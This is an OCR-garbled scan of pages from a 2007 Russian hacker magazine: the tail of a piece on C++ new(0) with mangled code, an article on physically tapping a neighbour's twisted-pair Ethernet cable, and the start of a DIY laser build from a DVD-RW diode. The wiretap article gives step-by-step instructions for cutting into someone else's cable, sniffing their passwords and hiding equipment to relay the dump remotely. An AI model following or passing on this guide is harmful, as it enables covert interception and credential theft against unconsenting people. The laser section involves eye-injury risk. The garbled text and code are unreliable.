роіпіегз Іо сіізііпсі оЬ]ес^з» («Отсюда следует, что оператор пеѵѵ() может 
вызываться с нулевым аргументом и возвращать валидный указатель 
на объект. Последовательный вызов пеѵѵ(О) возвращаетуказатели на 
различные объекты»). 

Дальше по тексту объясняется, что мы можем получить указатель на ну- 
левой объект, сравнивать его с любым другим указателем, но вот обра- 
щение к объекту нулевой длины Стандартом... ну не то чтобы запреща- 
ется, а отдается на откуп конкретным реализациям. Изучение исходных 
кодов РТБ-библиотек различных компиляторов показывает, что пеѵѵ(О) в 
общем случае эквивалентно пеѵѵ(1 ) независимо от типа объекта. 

Вот, например, фрагмент кода из ОСС: 




ФРАГМЕНТ КОДА ИЗ КОМПИЛЯТОРА ОСС, РЕАЛИЗУЮЩИМ ОПЕРАТОР 
ИЕѴѴ 

ѵоіб* орегабог пеѵ?(зІ 2 е_Ь зіге) 

// реализация оператора пеѵ«7 



// если зіге равно нулю, принудительно устанавлива- 
ем размер в единицу 

іі( зіге == 0 ) зіге = 1; 



} 



Оператор пеѵѵ, в свою очередь, опирается на РТ1_- библиотеку, общую как 
для Си, так и для Си++, а потому оператор пеѵѵ( 1 ) в большинстве случаев эк- 
вивалентен пеѵѵ(ОхР), что наглядно подтверждает следующая программа: 



} 




ДЕМОНСТРАЦИЯ СОЗДАНИЯ ОБЪЕКТА РАЗМЕРОМ В 1 БАЙТ С ПОМО- 
ЩЬЮ ЫЕѴѴ СНАК[0] 

шаіп ( ) 

{ 

// создаем символьный массив нулевой длины 
// (Стандартом это допускается) 
ейаг *с = пеѵѵ с1іаг[0] ; 



// получаем указатель на созданный объект 
// нулевой длины (Стандартом это допускается) 
сЪаг *р = &с [0] ; 



// записываем в объект нулевой длины число 0x69 
// (а вот этого Стандарт уже не допускает! ! ! ) 
*с=0х69 ; 



// проверяем успешность записи числа, выводя его 

//на экран 

ргіпбб ( " 0%ХЬ.\п" , *с) ; 



Чтобы не быть голословным, мыщъх приводитдизассемблерный фрагмент 
вышеупомянутой программы, откомпилированной МісгозоЙ Ѵізиаі С++ | 

_Ьеар_а11ос — служебная функция, на которую опирается оператор пеѵѵ): 



Ъеар_а11ос ргос пеаг 

агд_0 = бѵѵогб рбг 
ризЪ. езі 

шоѵ езі, [езр+агд_0] ; размер выделяемой памяти 
стр езі, бѵѵогб_406 63 0 ; выделяем больше 1016 байт 
за зЬогб 1ос_401В87 ; если да, то прыжок 

ризЪ езі ; обрабатываем ситуацию с 

саіі зЫі_а11ос_Ыоск ; выделением более 

1016 

безб еах, еах ; байт памяти 

рор есх 

3 П 2 зйогС 1ос_401ВАЗ ; прыжок, если памяти нет 




1ос_401В87 : 

Сезб езі, езі ; выделяем ноль байт?! 

3 П 2 зйогС 1ос_401В8Е ; если не ноль — прыгаем 
ризЬ 1 ; если ноль — увеличиваем 

рор езі ; аргумент на единицу 



1ос_401В8Е: 

абб езі, ОЕй ; округляем размер блока 

апб езі, ОРГРЕРРРОЬ. ; на ЮЬ. в большую сторону 

ризЬ езі ; бѵіВубез 

ризЬ 0 ; бѵѵРІадз 

ризЬ ЬНеар ; ІіНеар 

саіі бз : НеарАІІос ; выделяем блок памяти 



1ос_401ВАЗ : 






•ч I.'-- IV 






рЬгеакіпд 



V * 

Ч -V 

\ 

Витой 'Ч 

снифер 

Как прослушать витую пару 




Ты мастер взлома и шпионского софта, ты знаешь самые изощренные дырки и эксплойты. 
Твой сосед подключен к другой локалке, но тебе так хочется поснифать его траф, что зудит 
во всех местах сразу. Немного разведки и затык: он юзает исключительно витую пару. «Как 
быть?» — крутится у тебя в голове. Вот тут я собираюсь поведать тебе, что все возможно в 
нашем мире. Для начала определимся с тем, что не будем лезть в мельчайшие подробности 
стандарта ІЕЕЕ ЗШ 802.3. Этот стандарт о том самом Егйегпег, который тебе знаком по виту- 
хе, торчащей из всех щелей твоего убежища. Зато уделим больше внимания возможностям 
незаметного снятия данных с той самой витой пары, что вызывает хакерский зуд. Я соседс- 
кую имею в виду. Используй эти возможности с умом и осторожностью. 



Н ФЛЕШБЭКОХОРОШЕМ ПРОШЛОМ 

Если бы ты решил воплотить в жизнь подобную затею лет та к 1 0 назад, 
то все было бы относительно просто, так как раньше в большинстве 
случаев использовался коаксиальный кабель. Его даже не нужно было 
резать — достаточно было аккуратно добраться до центральной жилы 
и подключить свой кабель параллельно: центр к центру, оплетка к 
оплетке — и вуаля, можно тихо снифать траф, ну или не тихо, варианты 
имелись. 

Асейчасу настотальное распространениеТР (Тѵѵівіесі Раіг— витая пара). 
Замечу, что не единой витой парой живет сеть — помимо множества ее 
видов есть еще и оптика, но ее мы рассматривать не будет из-за сложности 
и дороговизны работы с ней. 

Итак, у настолько один путь — разбираться с работой витой пары. 



г ЖЕЛЕЗНАЯ ТЕОРИЯ ВИТОЙ ПАРЫ 

«Ну витая, что с нее взять?» — спросишьты. А я с улыбкой достану почти 
20тысяч страницспецификаций и упомяну о паре десятков дисциплин, 
требуемых для понимания этой заурядной витухи. Ну, попугал и хватит. На 
самом деле все нетаксложно, если уяснить основы. 

Вся сетевая технология, которая окружаеттебя, описана стандартами. 
Витая пара не исключение. Полное название стандарта — ІЕЕЕ 802.3 І_АЫ/ 
МАЫ СЗМА/Сй Асеева МеіЬосІ. Вообще, стандарт ІЕЕЕ 802 очень интересен 
и продуман. В интернете довольно много информации на эту тему, но в чаще 
всего она англоязычная. Я постараюсь объяснить тебе самое необходимое. 
Стандарт под номером 802 включает в себя практически все сетевые про- 
токолы. Кпримеру, 802.1 1 — ѴѴіРі, 802.15.1 — ВІиеІооіЬ, 802. 16 — ѴѴіМах. Нас 
же интересует 802.3 — ЕШегпеС 



► 128 



ХАКЕР 10 /106/ 07 






рЬгеакіпд 




В основе стандарта лежиттак называемая модель 051. Каждый уровень 
отвечаетза свое взаимодействие. Всего их семь: 

1 . Прикладной уровень (Аррііса^іоп Іауег) — доступ к сетевым службам 

2. Уровень представления (Ргегепіэ'Поп Іауег) — представление и 
кодирование данных 

3. Сеансовый у ровеньСЗеггіоп Іауег) — управление сеансами связи 

4. Транспортный уровень (Тгапгрог* Іауег) — безопасное и надежное 
соединение «точка-точка» 

5. Сетевой уровень (Ие^ѵогк Іауег) — определение пути и ІР (логическая 
адресация) 

в. Канальный уровень фа*а І_іпк Іауег) — физическая адресация 
7. Физический уровень (РИузісаІ Іауег) — кабель, сигналы, бинарная 
передача 

Конечно, это чисто теоретическое представление модели, и во мно- 
гих пунктах она реализована иначе, но для наглядности ее вполне 
достаточно. Ее ругают, говорят о ее неудачности, несостоятельности 
и громоздкости. Но именно на нее ориентируются все разработчики 
и производители сетевого оборудования. Нас интересует седьмой 
уровень — физический. На диаграмме представлена модель 051 и 
нижние уровни в стандарте 802.3. Канальный уровень состоит из двух 
частей: МАО клиента, который обеспечивает доступ к нижним уровням, 
и следующий за ним Месііа Асеева Сопіхоі, который отвечаетза доступ 
к физическому уровню. В самом низу находится физически уровень, в 
каждом устройстве он может быть выполнен по-своему, но сверху у него 
обязательно будет привязка к МАО, а снизу — физический коннект (в 
нашем случае витая пара). 

На схеме показан физический уровень (РНУ), отвечающий за согла- 
сование сетевой модели с физическим каналом, который может быть 
как витой парой, так и оптоволокном или другим носителем. Наглядно 
можно увидеть работу этой схемы в стандарте 1 0ВА5Е5. Этот стандарт 
— одна из первых реализаций 802.3. В качестве физического носи- 
теля здесь использовался коаксиальный кабельтолщиной 9 мм. Его 
оболочка была выполнена из огнестойкого пластика желтого цвета, 
отчего его называли еще «желтым ЕШегпеЕом». Так вот примечательно, 
что сетевая карта была двухкомпонентная: первая ее часть устанавли- 
валась на законное место в системе, вторая вешалась на сетевой кабель 
специальным устройством, в котором сигналы с кабеля преобразовыва- 



Двоичный код Манчестера 





Соединение двухустройств витой парой, справедливо для 10- и 100-мега- 
битного канала 



лись в формат, понятный первой части сетевой карты. Фактически вторая 
часть и была воплощением физического уровня — впоследствии ее можно 
было заменять другими интерфейсами. Желтый кабель практически не 
применяется (если найдешь место, где этот раритеттрудится, сообщи мне, 
плиз), но идея о разделении сетевого устройства по функциям еще живет, 
например, в высокоскоростных сетевых коммутаторах, где на каждый порт 
можно поставить свою плату, отвечающую за работу с каким-то одним 
носителем (оптика и другие). 

Кстати, присмотрись к этому девайсу, висящему на желтом кабеле. Называется 
он в народе «трезубцем» или «вампирчиком», поскольку прокусывает кабель 
так, что средний шип контактируете центральной жилой коаксиального кабеля, 
а два боковых шипа входят в контакте экраном основного кабеля. Заметь, это 
фактически железный снифер, но, к сожалению, только для этого типа сети. 
Вернемся к схеме, где показан РНУ. Проведя аналогию с «желтым 
ЕіЬепеТом», можно сказать, что ЬІІМК — это сам коаксиальный кабель. 
Уровень, зависящий отсреды передачи (Рбузісаі тесііит берепсіепі: 
Іауег), к каналу подключен через МйІ. Кстати, коробочка стрезубцем как 
раз и содержит в себе этотуровень. Далее уже по цифровому каналу он 
подключен к уровню, не зависящему отсреды передачи. На диаграмме 
этому уровню соответствует МИ. Сейчас же МП является стандартом для 
подключения микросхем РНУ к чипу (это может быть как чипсет, так и 
полноценный проц). Кстати, не ищи МП на современных сетевухах — там 
уже давно все интегрировали в один чип. «Но где же тут витая пара?» 

— спросишьты. «Правильный вопрос», — отвечу я и продолжу. В стандар- 
те есть множество оговорок на случай подключения витой пары, но я ис- 
хожу изтого, что ты живешь в обычном доме с обычными провайдерами, 
которые не станут проводить в квартиры гигабитную сеть. В классическом 
варианте, к которому привыкты, подключение полностью соответствует 
1 0-мегабитному стандарту: 

Для связи используются две витые пары, каждая работает толь ко в одну 
сторону. Для полноценной передачи требуются 2 канала — туда и обратно. 

В технической литературе такие каналы называются ТХи ПХ — этоаббреви- 
атуры от передачи (ігапвтй:) и приема (геееіѵе). При подключении двумя 
парами, каждая обозначается как передающая (ТХ) или принимающая 
(ПХ). Какая именно из них выполняетсвои функции, зависит оттипа 
кабеля (точнее, оттого, какего обжать): прямого и кросс-овер. Первый тип 
используется для соединения компьютера со свитчем/хабом, второй — для 
соединения двух компьютеров напрямую. 

Концы ТХ- и НХ-пар обжимаются разъемами по специальной схеме, кото- 
рую несложно найти в инете. Думаю, тебе эта схема давно знакома. Кстати, 
МйІ зачастую и обозначаетфизический разъем. 



Модель 051 с выделенной частью 802.3 
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На дискеты найдешь 
полную специфи- 
кацию ІЕЕЕ 802.3 
І_АІ\І/МАЫ С5МА/С0 
Ассезз МеіЬосІ. 



Но не подумай, что по проводам битики перекачивают как 
есть. И тут не всетак просто. Главная особенность витой пары 
заключается в том, что сигнал передается дифференциаль- 
ный, то есть разностный. Другими словами, он сформирован 
таким образом, что суммарное напряжение между проводами 
пары около нуля. Для примера — на одном проводе 2,5 В, тогда 
на другом однозначно -2,5 В, а сумма равна нулю. При таком 
способе передачи проводниксигнала (в нашем случае витая 
пара] излучает сигнал во внешнюю среду намного меньше и 
это излучение уловить тяжелее. Также он довольно устойчив к 
внешним помехам, так как ихлегко отфильтровать и воспри- 
нимать только сигналы, в сумме дающие 0. 

Каждый бит передается сменой сигнала с одного уровня на 
другой; такое кодирование известно как манчестерский код. 
При таком кодировании бит фиксируется при переходе от 
одного логического уровня в другой. Единица — при переходе 
с нижнего логического уровня на верхний, ноль — наоборот. В 
нашем случае с витой парой каждый битформируется сменой 
полярности в паре. Например, на проводе ТХ+ было 2,5 В, а на 

ТХ 2,5 В, это соответствует верхнему логическому уровню. 

При смене на нижний (ТХ+=-2,5; ТХ-=2,5) передали ноль. ТХ+ 

— передающая пара, положительный провод, а ТХ — пере- 
дающая пара, отрицательный провод. Плюс и минус введены, 
чтобы различать провода при их подключении. Если перепу- 
тать их — это не фатально, но в большинстве случаев сигнал 
будет принят неправильно. 

В чистом виде манчестерский код практически не использу- 
ют из-за сложности передачи большого количества нулей и 
единиц. На практике же применяют дополнительное кодиро- 
вание, когда группу битов кодируютс избытком, подмешивая 
нули и единицы. Такой способ позволяет не только нормально 
поддерживать передачу сигнала, но и проверять его целост- 
ность(смотри информацию на тему 8Ь/1 0Ь епсосііпд). 

г С НОЖОМ И КРОКОДИЛАМИ ИДЕМ 
К СОСЕДСКОМУ ЩИТКУ 

Ну как? Не отказался еще от своей идеи? Небось, голова уже 
пухнет (у литредаточно пухнет — примечание л итреда). Ну ни- 
чего, это только вначале — со временем привыкнешь. Придет- 
ся. Я поведал тебе только теорию, не касаясь практики. Хотя 
все на самом деле намного проще — нынешняя промышлен- 
ностьдошлатотакойунификации, что можно позволить делать 
многие вещи, даже не задумываясь о побочных эффектах и 
недостатках, которые непременно бы вылезли пару лет назад. 
Так воттеперь перейдем к практике. Для успешного снятия 
сигнала нам потребуется хороший нож (вполне подойдет 
обычный канцелярский — примечание сіііпу]), два крокодила с 
острыми зубцами, обжатая с одного конца витая пара, ноутбук 



с сетевой картой и софтом для снифинга. Я юзал БоЙРеНес! 
Меіѵѵогк РгоІосоІАпаІуіег — в течение 30 дней будет работать 
без проблем, хотя есть и бесплатные сниферы (пользователи 
никсов правятбалом). Берем обжатую витую паруй освобо- 
ждаем необжатый конец от внешней изоляции. Рекомендую 
взять провод длиной не менее двух метров. В ходе экспери- 
ментов я пользовался полуметровым обрубком, но его даже 
для опытов оказалось мало. Здесьтебе нужно найти РХ (входя- 
щий сигнал) пару (третий и шестой контакты у разъема твоей 
сетевухи). Если ты обжимал по всем правилам, то крокодилы 
нужно цеплять либо к оранжевой (оранжево-белой) (схема А), 
либо кзеленой (зелено-белой) паре (схема В). Инструкцию по 
обжимулегко нагуглить. Допустим, у тебя обжато в соответ- 
ствии со схемой А, тогда получается, что крокодилы висят на 
оранжевом и оранжево-белом проводах. 

Теперьстаким своеобразным проводом и лэптопом идем к 
месту врезки. Не забудь острый ножик — вдруг отбиваться 
придется [шутка]. Аккуратно сними внешнюю изоляцию с про- 
вода, не повредив жилу. Это можно сделать продольным над- 
резом. Для этого изогни провод и сделай неглубокий надрез 
длиной сантиметров 5-10. При этом старайся не зацепить и 
тем более не повредить и не перемкнуть пары внутри провода. 
Вынув витые пары из надреза, необходимо их развить, причем 
не все, а наиболее вероятные, например оранжевую. 

Далее тебе придется немного подумать — ведь нужен исходя- 
щий канал от человека, а не от провайдера, поскольку именно 
он отсылает пароли, а не они идут к нему (хотя всякое бывает). 
Надеяться на прямые руки наших монтажников не стоит, 
поэтому надо попробовать 2 варианта: оранжевую и зеленую 
пару (в особо запущенных случаях цвета могут быть совсем 
перепутаны]. Схема присоединения крокодилов проста: плюс 
к плюсу, минус к минусу. То есть одноцветный провод к одно- 
цветному, полосатый к полосатому. Все это также придется 
делать с оглядкой на инструкцию по обжиму: положитель- 
ный провод — полосатый, отрицательный — однотонный. 

Если монтажники не соблюдали инструкцию, то определить, 
какой из них какой, без сложной и громоздкой аппаратуры не 
представляется возможным — только перебор. Не забывай 
обусилии при зажиме крокодилами, иначе они не прокусят 
изоляцию провода и ты будешь еще долго маяться в поисках 
неисправности. Если крокодилы никак не хотят прокусывать 
провод, то можешь срезать вдоль него несколько миллиметров 
изоляции и подцепить ихуже куже голой меди. 

Найти исходящий канал можно по пакетам, передаваемым от 
юзера к провайдеру. Особенность ихтакова, что адресованы 
они обычно вышестоящим коммутаторам (ІР пункта назна- 
чения заканчивается на единицу, например 10.2.14.1) или 
прямиком в инет, ну а в отправителе стоит один итотже ІР. 
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Ну что, хорошо стоять с ноутом у разрезанной чужой витой пары? Сосед 
еще не вышел? Если тебя это не заботит, то продолжай снифать и 
тебе обязательно повезет, ведь большинство прог передает пароли в 
открытом виде. Оттебя требуется только настроить фильтр в снифере. 

А вот если тебя не устраиваетторчать с ноутом возле чужой двери, то 
можешь запихнуть его в близлежащую нычку, запитать и поднять ѴѴі-Рі 
канал, а дамп принимать на другом ноуте. Проблема ѴѴі-Рі в том, что 
весь дамп ты передать не сможешь даже при идеальной связи — про- 
пускная способность беспроводного канала в разы меньше. Но есть 
выход — настроить снифер на выявление лишь нужных тебе пакетов 
(например, аськи или ирки) и передавать только их — в таком случае 
можно обойтись не только ѴѴі-Рі, но даже 6РР5. Это как вариант. Това- 
рищ б Ііпуі загорелся идей использования ѴѴі-Рі роутера, но поспешу 
его огорчить — он (роутер] не будет передавать дамп, потому что это 
фактически управляемый свитч. Поясню: и роутеры, и свитчи анализи- 
руют данные и передают адресованные пакеты исключительно их ад- 
ресатам. Другой вариант — прокинуть витой провод с крокодилами до 
более спокойного места, хотя такой способ врезки с длинным проводом 
может принести разве что мусор в дампе, ну и постоянно падающий 
кон не кт у соседа — тут поможет только эксперимент. Вышеописанную 
инструкцию я опробовал сам на своем брате, выудив его пароль кась- 
ке. Хоть мы и пользуемся одним инетом и находимся в одной квартире, 
его комп запаролен и подключен к роутеру. Ставить кейлоггер было 
неспортивно, а снифать сетку из-за роутра — бесполезно, поэтому я и 
использовал метод ножа и крокодила. 

^ СПОСОБЫ, СТОЯЩИЕ ДЕНЕГ И/ИЛИ БОЛЬШИХ УСИЛИЙ 

Проблемой перехвата информации в первую очередь озадачиваются те, 
кому это позарез нужно. А если позарез нужно, то и в ресурсах недостатка 
нету. Воттакие люди и снабжают в дальнейшем своими разработками 
спецслужбы всего мира, ну или сами юзают— кто их знает. До меня доходят 
только слухи и обрывки из публичных источников. Сам понимаешь, такой 
информацией никто делиться добровольно не станет. Но я не рассказать 
не могу, так какэти зарисовки девайсов стояттого, чтобы быть озвученны- 
ми. Предупреждаю, это могут быть домыслы и плоды моего (или чьего-то) 
воображения. 

Начну с простого, это бесконтактный съем данных с витой пары — девайс 
был выставлен на СеВІТ 2007. Но сам я его в руках не держал и работоспо- 
собность не проверял. Могулишь предположить, что чувствительным эле- 
ментом является индуктивность или датчикХолла (датчикХолла — полупро- 
водниковый элемент, чувствительный к магнитному полю]. Оба варианта 
могутбыть реализованы вжелезе. 



Следующий способ — это сканирование и последующее выявление 
сигнала ЕіИегпеІ; по побочным электромагнитным излучениям. Недавно 
по Сети прокатилась волна научных (и не очень) публикаций на тему 
перехвата видеоизображения с ЖК-экранов ноутбуков. Особенность ви- 
деосигнала, передаваемого от видеочипа ноута кЖК-панели, втом, что 
он тоже дифференциальный (каку витой пары). Видео передается сразу 
по нескольким таким каналам. А перехватить и успешно декодировать 
этот видеосигнал на приличном расстоянии удалось даже лучше, чем в 
эксперименте с ЭЛТ-мониторами (эіс!). Так что, вполне вероятно, где-то 
в строго засекреченной каморке лежит девайс и... слушает весь ЕШегпеІ: 
в округе :). 

И, наконец, фактически тот же самый методе прямой врезкой в кабель, но 
вместо ноута используется одноплатный компьютер с ѴѴі-Рі картой. Сам по 
себе одноплатный компьютер является уменьшенным и переработанным 
вариантом обычного и предназначен для нужд промышленности, скажем, 
дляуправления станками или сбором и обработкой информации с датчиков 
(именно это я и предлагаю, только собирать он будет дамп из сети]. Такие 
компьютеры могутбыть какх86-совместимыми, выполненными на 386-м и 
более мощных процах, так и на других процессорных архитектурах, напри- 
мер РІ5С, АРМ или МІР5. И я уверен, что если у тебя есть роутер, то в нем 
стоит подобный комп, только софт его заточен под управление сетью. Если 
тебе удастся поставить на него Линукс или он уже установлен, то настроить 
Линукс на сниф и анализ дампа будетлегко. А запитать его зачастую можно 
даже от 1 2- В аккумулятора. 

Все подключили, запитали и спрятали в естественных нычках (нишах, 
шкафчиках, щитках, темном углу под потолком ит.д.]. А дамп сливается по 
радиоканалу. Просто и сердито, а главное — не нужно лично присутствовать 
на месте. Еслиужсовсем помечтать, то можно дать задание компьютеру 
фильтровать пакеты и даже выискивать пароли. А передать пару строчек 
можно и по ОРРБ, например, отправив соответствующее письмо на аноним- 
ный ящик. 

в ИТОГ 

Ты теперь представляешь, как работает ЕіЬегпеТ на каких принципах 
построен и с чем его едят. Конечно, в рамкахжурнальной статьи невоз- 
можно раскрыть все тонкости, но даже этой информации тебе хватит, чтобы 
начать эксперименты, а может быть даже, ловить реальные пакеты в чужой 
ЕШегпеІ-сети. Возможно, прочитанное подтолкнеттебя к самостоятельным 
поискам взаданном направлении. 

Думай, товарищ, и действуй осторожно. А если надумаешь что-нибудь дель- 
ное, не молчи, а сообщи общественности, ну или свяжись со мной, будет, 
что обсудить вместе. ИИ 



Глоссарий 

ІЕЕЕ — ІпзйШНе о^ЕІесіхісаІ апсі ЕІесГгопісз Еп§іпеег5 (Институт инженеров электротехники и электроники) — международная некоммерческая 
ассоциация специалистов в области техники, мировой лидер в области разработки стандартов по радиоэлектронике и электротехнике. За подробно- 
стями обращайся в Википедию. 

302 - индекс семейства стандартов, описывающих стандарт сети 802.3 — ЕгЬегпеИ. 

1_АІЧ/МАМ(І_оса1 Агеа Ме^ѵогк/Ме’кгороіііэп Агеа ІЧе+ѵогк) — локальная вычислительная сеть/городская вычислительная сеть. 

СЗМ А/СО (Сагпег-Зепге МиИірІе Аесегг ѵі*Ь Соііізіоп Ое+есНоп) — множественный доступ с контролем несущей и обнаружением коллизий. 
Это название алгоритма передачи данных. 

ОЗКОрепЗуз^етгЫегсоппес'МопРеГегепсеМогіеІ) — модель взаимодействия открытых систем. Абстрактная модель для сетевых коммуника- 
ций и разработки сетевых протоколов. Представляет уровневый подход, где каждый уровень обслуживает свою часть процесса взаимодействия. 
Благодаря такой структуре совместная работа сетевого оборудования и программного обеспечения становится гораздо проще и понятнее. 

РНѴ (РЬугісаІ Іауег) — физический уровень. 

МІіСМѳЛаІп^ереп^ѳпНп^ѳгГасе) — независимый от среды интерфейс . 

МАС(МесІіа АссеггСоп+гоІ) — управление доступом к носителю. 

М АС-адрес — это уникальный идентификатор, сопоставляемый с различными типами оборудования для компьютерных сетей. 
МвКМегііитРерепгіеп'ІЫегГасе) — интерфейс, зависящий от передающей среды. 
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Н ИДЕЯ 

Поначалу, решив сделать свой лазер, я даже не знал, с чего начать. Рыская 
в инете и мучая поисковики, я тут и там натыкался на народныхумелыдев, 
которые мастерили свои лазеры. Как правило, это были сооружения раз- 
мером с обеденный стол из сложного стекла и дорогостоящих материалов. 
При этом точность изготовления такого лазера требовалась очень большая, 
почти заводская. Посмотрев цены на детали для этих лазеров, я совершено 
скис — они явно превышали мой двухмесячный доход. Но та к хотел ось чего- 
то очень простого, сделанного за пару часов и с минимальными капитало- 
вложениями! 

Оторвав взгляд от монитора, я посмотрел на умирающий йѴО-РѴѴ привод. 
«Вот оно, счастье!» — подумал я. Чем сложнее привод (СО, СО-РѴѴ, 0Ѵ0, 
ОѴО-РѴѴ) и чем вышеу него скорость, тем больше мощность лазерного дио- 
да. Занимаясь бесперспективной переделкой лазерных указок несколько 
лет назад, я и не подозревал, что все, что мне нужно для создания прожи- 
гающего лазера, естьу меня под рукой. Только тогда мне совершенно не 
могло придти в голову выкорчевывать что-либо из новомодного свежеку- 
пленного пишущего ОѴО-ПОМ’а. А когда эта идея созрела, у меня уже было 
несколько отслужившихдоноров. 

Итак, сегодня мы будем делать лазерную пушку из подручных средств. 

Для изготовления лазера нам понадобится битый ОѴО-РѴѴ привод, набор 
отверток, скрепка и прямые руки. 



Плазмаган 
у тебя дома 

Настоящий лазер из старого йѴО-резака 

Многим из нас когда-то хотелось иметь 
настоящий лазер. Поначалу мы радостно 
скупали лазерные указки, но быстро раз- 
очаровались в их мощности. Когда я был 
маленьким, я думал соорудить свой лазер, 
но, посмотрев умные книжки и поняв, что 



нужна сложная стеклодувная мастерская 
и прочие прибамбасы, отказался от этой 
идеи. Недавно я решил выяснить, что дела- 
ют наши умельцы. Их устройства оказались 
сложными и дорогостоящими, а главное 
— громоздкими. В этой статье я поведаю 
тебе, как сделать настоящий мощный лазер, 
которым ты сможешь прожигать бумагу, 
резать пластик и зажигать спички, из под- 
ручных средств. 



В РАЗБИРАЕМ ПРИВОД 

Для начала нужно подобрать подходящий привод. Если есть, из чего 
выбрать, то учти, что чем большеу привода скорость записи, тем мощнее 
у него лазер. Я откопал у себя одно из первых ОѴО-пишущихустройств 
— РіопеегОѴП-105 ЮѴ0-В4Х, ОѴй-РѴѴ 2Х) аж 2002 года выпуска. Самое 
главное, чтобы это был именно йѴО-РѴѴ привод, а не обычная читалка 
ОѴО’шников. Дело в том, что для прожига йѴй требуется гораздо более 
мощный лазер, чем, например, для обычных йѴй или СО-РѴѴ. В приводе 
есть все, что нужно, чтобы сделать собственный лазер, кроме источника 
питания. Будем считать, что ты нашел жертву-донора для своих опытов, 
значит, тогда можно приступать к разбору. 

Чтобы вскрыть привод, для начала надо выкрутить все винты, затем снять 
переднюю панель. Для снятия передней панели нужно вынуть лоток. Это 
можно сделать, либо запитав дивидюк от какого-нибудь компового БП и 
нажав кнопку Еіесі, либо вставив твердую острую проволоку в специальное 
гнездо на морде, и тогда лоток выйдет сам. Идеально для этих целей подойдет 
обычная канцелярская скрепка. Лично я сделал это надфилем, таккакскреп- 
ку банально в своей берлоге найти не смог. После того как мы выдвинули 
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лоток, надавливаем на разные защелки передней панели и пытаемся ее 
вынуть. Мучить защелки стоит плоской отверткой. После расчехления при- 
вода нужно действовать по обстоятельствам. Сколько я подставок под кофе 
не разбирал, каждый раз дивился изобретательности производителей и 
ухищрениям разработчиков. Поэтому единой универсальной инструкции 
по разбору приводов я, ксожалению, привести не смогу. 

Взглянув во внутренности, мы видим две направляющие рельсы, на них 
установлена сама головка с лазерами. У меня рельсы крепились винтами. 
Отсоединяем шлейфы, идущие от платы к головкам, и выкручиваем все 
винты. Видно, что под винты подложены резиновые прокладки для исклю- 
чения биений и вибраций. Высокоточная техника, понимаешь... Нещадно 
выкорчевав головку, скорее всего, ты найдешь на ней два полупроводнико- 
вых лазерных диода. Один из них инфракрасный и не представляет для нас 
особого интереса. Другой же — с излучением в видимом красном спектре 
— нам и нужен. Внешне они могутбытьсовершенно одинаковыми, такчто 
выбирать необходимый придется методом проб и ошибок. 

У тебя на столе лежит конструкция сложнейшего лазерного устройства, а 
главное — она достаточно мощная. Остатки резака можно смело выбро- 
сить, предварительно посмотрев, что еще можно применить в наших 
фри керских делах. Например, из него можно достать отличный шаговый 
двигатель, который можно применить в высокоточном приводе робота, 
кучу интересных микросхем и прочих полезных девайсов. В общем, если 
не лень, вооружайся Гуглом, смотри детали и, может, найдешь что-то по- 
настоящему ценное. Большинство составляющих своих поделок я снимаю 
со старого железа. 

^ МОНТИРУЕМ ЛАЗЕР 




Головка 



Петров, вот это тема! Я же с детства 
мечтал о такой штуке, думал, 
это дико сложно сделать. А тут, 
оказывается, в любой ОѴО-писалке 
крутой лазер! Пойду выжигать :). 



Чувак, не торопись. Ты в курсах, 
что даже отраженное от стены 
излучение может повредить 
зрение? Лазер — это серьезная 
вещь, можно покалечиться. Так 
что будь очень осторожным. 





В принципе головка —уже законченная лазерная установка. Там стоит 
отличная оптика, есть все диоды. Фокусирующая линза подвешена в 
магнитах, как головка динамика, что позволиттебе, разобравшись с ее 
работой, точно фокусироваться. Но, как показала моя практика, на этой 
прекрасной отъюстированной оптике теряется значительная мощность 
лазера и поподжигать нечего не удастся. Да и потом разбираться с чужим 
устройством мне лично совершенно не хотелось. Я стремился сделать свой 
лазер здесь и сейчас. Если ты со мной солидарен, двигаемся дальше. 

Надо выкорчевать сами лазерные диоды и выходную линзу из головки. 
Теперь ответственный момент — нужно определить, какой лазеру нас 
относится к 0Ѵ0, а какой — к СБ. Коротко говоря, для этого нужно запитать 
по очереди каждый диод и посмотреть на яркость свечения. Когда ты уви- 
дишь, как ярко вспыхивает ОѴО-диод по сравнению с Сй (если он окажется 
видимого диапазона), тоты поймешь, что это тот диод, который тебе нужен. 



Замеряем температуру 
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Поджечь излучением лазера спичку - проще простого! 
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Внимание! Лазер- 
ный луч опасен для 
глаз. С этой игруш- 
кой ты запросто 
можешь лишиться 
зрения или лишить 
его окружающих. По- 
этому будь предель- 
но осторожен при 
обращении с ним. 
Всегда используй 
средства защиты. 

Ни автор, ни редак- 
ция не несут никакой 
ответственности за 
возможные послед- 
ствия использования 
этого материала. 



Вотздесьу нас два очень важных момента! Во-первых, это 
все-таки настоящий лазер, и даже если ты светанешьсебе в 
глаз без фокусирующей линзы, то все равно запросто можешь 
лишиться зрения! Потому притестировании свети диодиком в 
сторону, желательно на матовую темную бумагу. Я, например, 
долго ловил зайчиков, когда светанул на противоположную 
стену. Глаза болели даже на следующий день. Поэтому для 
страховки рекомендую использовать темные очки. 

Во-вторых, несмотря на то что диод рассчитан на 5 В, он 
работаетв импульсном режиме, что не даетему сильно на- 
греваться. Поначалу я лихо спаял между собой три батарейки 
и подключил ОѴО-диод к ним. Пока экспериментировал, яр- 
кость на глазах падала, пока совсем не иссякла. Такя лишился 
диода, поняв, что 5 В не лучшее для него питание. Оптимально 
использовать две пальчиковые батарейки, получится меньше 
3 В. При этом светодиод нельзя перегружать. Он не должен 
работать более 30 секунд, а после важно дать ему остыть. 

Итак, приступим ктестам на определение диода. У обоих 
диодов три ноги, но две из них должны быть спаяны вместе. 
Это у нас будет «плюс», а одиноко стоящая ножка — «минус». 
Аккуратно подпаиваем проводки, я взял их от витой пары 
— жесткие и удобные, а главное — рядом. Направляем све- 
тодиод от себя, на матовую поверхность (можно на одежду) и 
подключаем батарейку. Если светит слегка, как фонарик, то это 
сидюшный излучатель. Но вот если сверкает, как строитель- 
ный прожектор, ярко красным светом, то это тот диод, который 
нам нужен! 

Выпаяв нужный диод, важно сразу озаботиться контролем 
его температуры и охлаждением, так как при перегреве они 
очень часто мрут. Для замера температуры я использовал 




термалтейковский термометр с регулируемой пороговой 
сигнализацией, прикрепив термопару к корпусу диода. Без 
радиатора он нагрелся выше 60 градусов. Тогда я закрепил его 
на радиаторе от какого-то древнего процессора, чтоуменьши- 
лотемпературу примерно на 10 градусов. После закрепления 
диода и подачи питания ты увидишь светящий во все стороны 
прожектор. «Ну и какой это лазер? — спросишьты. — Ведь он 
светит во все стороны, а лазер — это узконаправленный луч». 
